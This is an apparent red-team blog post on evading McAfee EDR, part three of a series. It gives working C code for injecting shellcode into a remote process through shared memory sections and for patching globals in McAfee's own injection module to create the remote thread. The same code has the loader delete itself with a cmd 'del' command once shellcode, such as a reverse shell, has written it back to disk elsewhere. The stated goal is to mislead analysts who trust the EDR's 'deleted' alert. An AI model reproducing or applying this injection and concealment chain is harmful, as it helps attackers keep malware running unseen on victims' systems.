Originally published by cyberwarfare: Blending with McAfee [Part-3]
Malware behaves like a parasite. Where possible, it lives inside other processes and performs its malicious actions from there. Hiding inside legitimate processes makes it stealthier and harder to detect. One of the best-known, easiest, and most widely used WinAPI functions for injecting into another process is CreateRemoteThread (CRT). For that reason, AV/EDR products monitor this API heavily, by every available means: userland hooking, event monitoring, kernel monitoring, and so on.
While experimenting with McAfee EDR, our initial plan was to bypass it and make the CreateRemoteThread API usable again, because a normal call to CreateRemoteThread was detected as malicious. We found that McAfee hooks both CreateRemoteThread and CreateRemoteThreadEx but does not hook NtCreateThreadEx in ntdll. We eagerly tried NtCreateThreadEx because it was not hooked, yet our payload was detected and deleted every time. We tried every way we could think of to call the CRT API and failed each time. Below are all the tests that we performed:
At this point we know that a call to CreateRemoteThread is not detected when internet/cloud protection is off, and that it is also not detected when the handle passed to it is the local process handle.
// Pseudocode for the behavior we inferred; -1 is the current-process pseudo-handle
if (cloud_protection_on && handle_in_CRT != -1) {
    return process_is_malicious_perform_delete_action;
}
We tried a few other things to make the CRT call undetectable, but they eventually failed too. There are a few other working ways to bypass both cloud and adaptive protection and execute a payload in a remote process. However, we insisted on using CRT no matter what obstacles came our way.
How exactly does McAfee EDR react to API call CreateRemoteThread?
In our loader/payload we located CreateRemoteThread dynamically and called it, which kept McAfee EDR from flagging the loader/payload as malicious at runtime. We delayed the program for about 2 minutes before calling CreateRemoteThread, and nothing happened during that time. CreateRemoteThread then executed and the shellcode ran normally in the remote process; however, within 10–12 seconds our loader/payload was detected as malicious and deleted immediately. The good news is that the shellcode kept running.
Abusing this behavior
Note: Before starting, we want to make clear that this is not a bypass. The alert will definitely be generated and our payload/loader will still be deleted.
From the section above we know how McAfee behaves when the CRT API is called. There are a few things we can take advantage of:
- Our injected shellcode keeps running even after the loader/payload is deleted.
- There is a time gap between the CRT execution and the deletion of the loader/payload.
So we came up with a plan to fool the EDR and the analyst (though not every analyst). The plan is simple: because the EDR is so powerful, most of us trust it most of the time. The logs say that it deleted our loader/payload, and if the EDR reports that the malware is gone, a lazy reader will believe it. Our plan starts from there. We move the shellcode and the loader into the target process memory, have the shellcode write the loader to a different location on disk before it runs its actual functionality, and finally have the original executable self-destruct. In short, we hide behind the EDR's genuine alert. Broken down, the plan is:
Loader:
- Write shellcode and loader into the target process
- Execute CreateRemoteThread
- Wait 7 seconds (so that the shellcode can write the loader to another location on disk)
- Delete itself from disk
Shellcode:
- Write the loader buffer from memory to a new location on disk
- Update the persistence mechanism (if implemented)
- Clean up the loader buffer from memory
- Run the rest of the shellcode, for instance a reverse shell
Key Notes:
- The loader is written to disk by the shellcode because, if the loader wrote itself to another location and then self-destructed, the EDR would also delete the file the loader had just created.
- Because the loader buffer is written to disk by shellcode running in another process, the analyst will find no trace of the loader itself writing to disk.
- The loader destroys itself before the EDR deletes it. The alert is still generated and reports that the malware was successfully deleted. Whether to dig into the incident or to believe the EDR is then up to the analyst.
Implementation
Since we are working with McAfee EDR, we decided to use the EDR-Recast technique [EDR-Recast link] as well. To avoid WriteProcessMemory calls, we used NtCreateSection and NtMapViewOfSection to write our shellcode and loader buffer into the remote process.
We created two sections, one for the shellcode and one for the loader buffer. The loader buffer has to be copied before the shellcode, because a few values that depend on it are copied into the shellcode section along with the shellcode. When creating the section for the loader buffer we pass the MAXIMUM_ALLOWED flag; in our tests this was needed because the loader buffer is larger than 4 KB.
We then map each section into both the local and the remote process and copy the loader buffer to the local section base address. Because both processes share the same section, whatever is copied to the local section base address also appears at the remote section base address.
// CreateSection for payload
SIZE_T actualSize = sizeof(buf) + sizeof(junks) + sizeof(ShellData);
SIZE_T scSize = sizeof(buf) + sizeof(junks) + sizeof(ShellData);
LARGE_INTEGER lScSize = { scSize };
// MAXIMUM_ALLOWED => this flags allows to create section larger than 4K
status = fpNtCreateSection(&hSection, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE | SECTION_EXTEND_SIZE | MAXIMUM_ALLOWED,
NULL, (PLARGE_INTEGER)&lScSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);
if (!NT_SUCCESS(status)) {
perror("[+] Error on Creating Section\n");
exit(-1);
}
printf("[+] Section Created\n");
// Map view of section to local process
PVOID localSectionBaseAddr = { 0 };
PVOID remoteSectionBaseAddr = { 0 };
status = fpNtMapViewOfSection(hSection, GetCurrentProcess(), &localSectionBaseAddr, NULL, NULL, NULL, &scSize, ViewUnmap, NULL, PAGE_EXECUTE_READWRITE);
if (!NT_SUCCESS(status)) {
perror("[+] Error on NtMapViewOfSection Local\n");
exit(-1);
}
//DelayExecution(0x4);
printf("[+] Mapped view to local process\n");
CLIENT_ID pid;
InitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL);
pid.UniqueProcess = (HANDLE)(a_pid);
pid.UniqueThread = (HANDLE)0;
// Getting handle to target process
fpZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &objAttr, &pid);
if (hProcess == INVALID_HANDLE_VALUE) {
printf("[-] Invalid Handle Value \n");
}
printf("[+] Got handle to the process %d\n", (DWORD)hProcess);
//DelayExecution(0x6);
// Map view of section to target process //For shellcode RWX
status = fpNtMapViewOfSection(hSection, hProcess, &remoteSectionBaseAddr, NULL, NULL, NULL, &scSize, ViewUnmap, NULL, PAGE_EXECUTE_READ);
if (!NT_SUCCESS(status)) {
perror("[+] Error on NtMapViewOfSection Remote\n");
exit(-1);
}
printf("[+] Mapped view to remote process\n");
The same process is followed for the shellcode; however, we need to pass a few pieces of information to the shellcode:
- New path where we want to place our loader buffer
- Base address of loader buffer in memory i.e., base address of remote section
- Size of loader buffer
// [-- We created the section for shellcode but we'll not copy our shellcode
// there's something we need to add before copying shellcode --]
// CreateSection for payload buffer
// Getting payload and payload size
wchar_t payload_addr[0x100] = { 0 };
size_t len = 0;
mbstowcs_s(&len, payload_addr, argv[0], strlen(argv[0]));
wprintf(L"[+] Payload Name %s\n", payload_addr);
//system("pause");
size_t payload_size = 0;
BYTE* buffer = GetPayloadBuffer(payload_addr, payload_size);
SIZE_T p_size = payload_size;
//SIZE_T scSize = sizeof(buf) + sizeof(junks) + sizeof(ShellData);
lScSize = { p_size };
status = fpNtCreateSection(&pHSection, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE | SECTION_EXTEND_SIZE | MAXIMUM_ALLOWED,
NULL, (PLARGE_INTEGER)&lScSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);
if (!NT_SUCCESS(status)) {
perror("[+] Error on Creating Section\n");
exit(-1);
}
printf("[+] Section Created\n");
//DelayExecution(0x2);
// Map view of section to local process
PVOID localPESectionBaseAddr = { 0 };
PVOID remotePESectionBaseAddr = { 0 };
status = fpNtMapViewOfSection(pHSection, GetCurrentProcess(), &localPESectionBaseAddr, NULL, NULL, NULL, &p_size, ViewUnmap, NULL, PAGE_EXECUTE_READWRITE);
if (!NT_SUCCESS(status)) {
perror("[+] Error on NtMapViewOfSection Local\n");
exit(-1);
}
printf("[+] Mapped view to local process\n");
// Map view of section to target process //For shellcode RWX
status = fpNtMapViewOfSection(pHSection, hProcess, &remotePESectionBaseAddr, NULL, NULL, NULL, &p_size, ViewUnmap, NULL, PAGE_EXECUTE_READ);
if (!NT_SUCCESS(status)) {
perror("[+] Error on NtMapViewOfSection Remote\n");
exit(-1);
}
printf("[+] Mapped view to remote process\n");
printf("[+] Copying PE to mapped section...\n");
memcpy((void*)localPESectionBaseAddr, buffer, payload_size);
Since we are calling the CreateRemoteThread API, we can pass a parameter (lpParameter) to the thread function (the shellcode, i.e. StartAddress). However, we need to pass several pieces of information to the shellcode, and lpParameter is a single pointer. To solve this, we created the structure “XShellData”, which has 3 members: new_path, mem_loc, and copy_size.
- new_path: new path location to move loader buffer
- mem_loc: loader buffer memory location
- copy_size: number of bytes to copy (size of loader buffer)
A heap buffer is allocated with the size of (shellcode + junks + XShellData). Once the shellcode, the junk bytes, and the XShellData have been copied into the heap buffer, its contents are copied to the local section address created for the shellcode. Because the section is shared, the shellcode and the XShellData are now present at the remote section base address as well. It is then time to call the CreateRemoteThread API: lpStartAddress is the remote base address of the shellcode, and lpParameter is the remote address of XShellData, i.e., remote base address + sizeof(shellcode) + sizeof(junks).
// setting up parameters
char newPath[0x100] = "";
// This is the path where we move our shellcode. This path can be dynamically
// generated or can be encrypted for stealthier.
// TODO: Finding Random Directory with RWX permission
// TODO: Generate Random name for the payload
strcat_s(newPath, "C:\\Users\\Xploiter\\AppData\\Local\\Temp\\test.exe");
strcpy_s(ShellData.new_path, newPath);
ShellData.mem_loc = remotePESectionBaseAddr;
ShellData.copy_size = payload_size;
memcpy((void*)((UINT_PTR)heapAddr + sizeof(buf) + sizeof(junks)), &ShellData, sizeof(ShellData));
printf("[+] Copying payload to mapped section...\n");
memcpy((void*)localSectionBaseAddr, heapAddr, actualSize);
// Patching Global for CRT
DWORD CUTPatchAddr = ((ULONG_PTR)hMfehcinj + CUT);
DWORD CUTPatchBytes = 0x0;
DWORD CRTPatchAddr = ((ULONG_PTR)hMfehcinj + CRT);
pResolveProcAddress("kernel32.dll", "CreateRemoteThreadEx", &procAddr);
DWORD CRTPatchBytes = (DWORD)procAddr;
memcpy((void*)CUTPatchAddr, &CUTPatchBytes, sizeof(DWORD));
memcpy((void*)CRTPatchAddr, &CRTPatchBytes, sizeof(DWORD));
LPTHREAD_START_ROUTINE runME = (LPTHREAD_START_ROUTINE)remoteSectionBaseAddr;
printf("[+] Executing...\n");
//Crafting Remote Thread
CreateUserOrRemoteThread createUserOrRemoteThread = (CreateUserOrRemoteThread)((UINT_PTR)hMfehcinj + CURTFunc);
// param location offset
DWORD param = sizeof(buf) + sizeof(junks);
createUserOrRemoteThread((void*)hProcess, (void*)remoteSectionBaseAddr, (void*)((UINT_PTR)remoteSectionBaseAddr + param));
// Self-destruct
// https://stackoverflow.com/questions/1606140/how-can-a-program-delete-its-own-executable/66847136#66847136
// alternatively we can put our binary
// in delete-pending state
char* process_name = argv[0];
char delCommand[256] = "start /min cmd /c del ";
strcat_s(delCommand, process_name);
// Delaying before self-destruct so that shellcode can move the binary to other location
printf("[+] Delaying Before self-destruct...\n");
DelayExecution(0x7);
printf("[+] Attempting to delete itself...\n");
system(delCommand);
In memory, the shellcode, the junk bytes, and XShellData are laid out contiguously in that order, starting at the section base address.
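The layout can also be illustrated with plain offset arithmetic. The following is a minimal, portable sketch rather than the project's code: the member names of XShellData come from the description above, but the member types, the helper names (param_offset, stage_buffer, read_params), and the placeholder bytes are assumptions made for illustration only. It uses no Windows APIs and only shows how the parameter block ends up at base + sizeof(shellcode) + sizeof(junks).

```cpp
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Member names follow the post; the member types and sizes are assumptions.
struct XShellData {
    char        new_path[0x100]; // destination path for the loader copy
    void*       mem_loc;         // address of the loader buffer
    std::size_t copy_size;       // number of bytes to copy
};

// Offset of the parameter block in a buffer laid out as [code | junk | XShellData].
constexpr std::size_t param_offset(std::size_t code_size, std::size_t junk_size) {
    return code_size + junk_size;
}

// Hypothetical helper: concatenates the three parts into one contiguous buffer.
// The "code" and "junk" bytes are opaque placeholders in this sketch.
std::vector<std::uint8_t> stage_buffer(const std::vector<std::uint8_t>& code,
                                       const std::vector<std::uint8_t>& junk,
                                       const XShellData& data) {
    std::vector<std::uint8_t> out(code.size() + junk.size() + sizeof(XShellData));
    std::copy(code.begin(), code.end(), out.begin());
    std::copy(junk.begin(), junk.end(), out.begin() + code.size());
    std::memcpy(out.data() + param_offset(code.size(), junk.size()), &data, sizeof(data));
    return out;
}

// Hypothetical helper: reads the parameter block back from a given offset,
// the way the receiving side would parse the three members.
XShellData read_params(const std::vector<std::uint8_t>& staged, std::size_t offset) {
    assert(offset + sizeof(XShellData) <= staged.size());
    XShellData data;
    std::memcpy(&data, staged.data() + offset, sizeof(data));
    return data;
}
```

Calling read_params with param_offset(code.size(), junk.size()) returns the same three members that were staged, which is the property the lpParameter calculation relies on.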
In the shellcode, the parameter passed from CRT (the base address of XShellData) is at esp + 8. From there the shellcode reads all 3 members, new_path, mem_loc, and copy_size, writes the loader to the new location, and then runs the rest of its functionality.
Video : https://drive.google.com/file/d/1Tt-BtjzQOSqaBgGw8dhY0gR4SuazXLsy/view
Project Link : https://github.com/RedTeamOperations/Journey-to-McAfee/tree/main/TrueAlert
Conclusion
Almost all EDRs perform behavioral analysis to detect malware, which makes it very difficult for red teamers and threat actors to operate. Most of our favorite techniques are usually detected by AV/EDR products no matter what. Bypassing EDRs is quite difficult these days; however, we can perform behavioral analysis on the EDR itself and craft a payload tailored to a specific EDR, as we did in this blog. Security analysts, for their part, should not fully trust the EDR even though it is very powerful. Unexpected things tend to happen in powerful places.